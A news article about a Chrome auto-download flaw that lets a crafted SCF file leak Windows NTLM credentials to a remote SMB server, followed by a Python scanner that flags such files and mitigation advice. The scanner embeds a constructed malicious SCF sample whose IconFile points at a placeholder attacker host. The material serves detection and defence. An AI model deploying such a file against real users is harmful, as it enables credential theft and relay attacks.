Hackers could use Google Chrome to gain access to your Windows login
Google Chrome users have been cautioned about a newly disclosed attack that lets hackers harvest Windows login credentials, specifically the user name and NTLM authentication hash, by abusing Chrome's automatic file downloads.
These login details can be immediately reused, allowing cybercriminals to "impersonate members of the organisation" and launch further attacks "on other users or gain access and control of IT resources".
The new vulnerability was disclosed by Bosko Stankovic, a security engineer at DefenseCode.
"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim's authentication credentials," Stankovic wrote.
To siphon Windows login credentials with Google Chrome, Stankovic combined two previous attack techniques – one borrowed from the Stuxnet campaign, and another demonstrated by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference.
According to Stankovic, the attack is relatively simple to execute.
Hackers need only trick victims into clicking a malicious link, which automatically downloads a Windows Explorer Shell Command File, or SCF file, with no save prompt.
"With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one," Stankovic writes.
"From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage.
"However, what if the downloaded file requires no user interaction to perform malicious actions?"
Once the .SCF file has been silently saved to the user's Downloads folder, it lies dormant until the user opens that folder in Windows Explorer.
Explorer then parses the file to render its icon, and because its IconFile entry points to a UNC path on the attacker's SMB server, Windows automatically tries to authenticate to that server, handing over the victim's user name and NTLM challenge-response hash without the file ever being clicked.
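To make the trigger concrete, here is an added Python example (not code from DefenseCode or from the article) that parses the INI-style SCF format and flags any file whose IconFile entry points at a remote UNC host, which is the condition that makes Explorer open an SMB connection while merely listing the folder. The two SCF samples and the host name attacker.example are constructed for the example; the same check could be run over a real Downloads directory.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the structure of a credential-leaking SCF file as
# described in the article. "attacker.example" is a placeholder host.
MALICIOUS_SCF = (
    "[Shell]\r\n"
    "Command=2\r\n"
    "IconFile=\\\\attacker.example\\share\\icon.ico\r\n"
    "[Taskbar]\r\n"
    "Command=ToggleDesktop\r\n"
)

# Constructed sample modelled on the legitimate "Show Desktop.scf" that ships
# with Windows: its icon is a local resource, so it must not be flagged.
BENIGN_SCF = (
    "[Shell]\r\n"
    "Command=2\r\n"
    "IconFile=explorer.exe,3\r\n"
    "[Taskbar]\r\n"
    "Command=ToggleDesktop\r\n"
)


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-style SCF format into {section: {key: value}}.

    Section and key names are lower-cased because Explorer treats them
    case-insensitively; values are kept verbatim.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


# A UNC path is two backslashes followed by a host name or IP address.
UNC_HOST = re.compile(r"^\\\\([^\\/\s]+)(?:[\\/]|$)")


def icon_file(text: str) -> Optional[str]:
    """Return the IconFile value from the [Shell] section, if present."""
    return parse_scf(text).get("shell", {}).get("iconfile")


def remote_icon_host(text: str) -> Optional[str]:
    """Return the host Explorer would authenticate to when rendering the icon.

    A UNC IconFile target triggers an outbound SMB connection and NTLM
    authentication with no click; a local path or resource reference
    returns None.
    """
    target = icon_file(text)
    if not target:
        return None
    match = UNC_HOST.match(target)
    return match.group(1) if match else None


def scan_downloads(files: Dict[str, str]) -> List[Tuple[str, str]]:
    """Flag every .scf file whose icon lives on a remote host.

    `files` maps file name -> file content, standing in for a directory
    listing so the example runs without touching the filesystem.
    """
    findings: List[Tuple[str, str]] = []
    for name, content in files.items():
        if not name.lower().endswith(".scf"):
            continue
        host = remote_icon_host(content)
        if host:
            findings.append((name, host))
    return findings


if __name__ == "__main__":
    downloads = {"Show Desktop.scf": BENIGN_SCF, "invoice.scf": MALICIOUS_SCF}
    for name, host in scan_downloads(downloads):
        print(f"{name}: IconFile points at \\\\{host}, Explorer would send NTLM credentials there")
```

The scanner only tells you which downloaded files would fire the SMB authentication; it does not stop it. Blocking outbound SMB (TCP port 445) at the network edge and enabling Chrome's "Ask where to save each file before downloading" option are the two settings that break the silent download-then-authenticate chain.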
DefenseCode did not inform Google about the vulnerability following the publication of the blog post.
However a spokesperson for Google told ThreatPost: "We’re aware of this and taking the necessary actions."
"Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password," Stankovic has warned.